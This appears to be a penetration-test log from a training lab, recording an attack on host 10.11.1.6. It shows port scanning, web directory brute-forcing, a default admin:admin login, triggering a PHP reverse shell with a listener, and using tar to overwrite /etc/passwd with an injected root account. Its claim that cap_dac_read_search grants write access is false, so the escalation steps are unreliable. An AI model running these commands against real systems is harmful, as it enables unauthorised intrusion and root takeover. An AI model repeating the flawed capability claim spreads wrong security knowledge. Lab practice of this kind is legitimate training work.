🧪 Pentest Log: {{date:2025-08-24}}

🔍 Target Information

• Machine Name: Web01-Dev V2
• IP Address: 10.11.1.6
• Operating System: Linux

ip=10.11.1.6

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Login with

admin:admin

Found "php-reverse-shell.php", use it to connect back to the host

Port 8080

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: LFI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

http://10.11.1.6/workspace/Web01-Test/php-reverse-shell.php


python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80

🧬 Privilege Escalation

👤 Current Access

• User: apache
• Groups: apache
• Shell Type: web shell

🔍 Enumeration

Binary Capabilities:

getcap -r / 2>/dev/null

found cap_dac_read_search+ep on

/usr/bin/tar

Which means we can read and write on any file without permission restriction

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Capability Abuse
• Target Binary/Service: tar
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

tar cvf /tmp/passwd.tar -C /etc passwd
tar xf /tmp/passwd.tar -C /tmp passwd


echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /tmp/passwd;

tar cvf /tmp/passwd.tar -C /tmp passwd
tar xf /tmp/passwd.tar -C /etc passwd

• Smash to root

su tony

password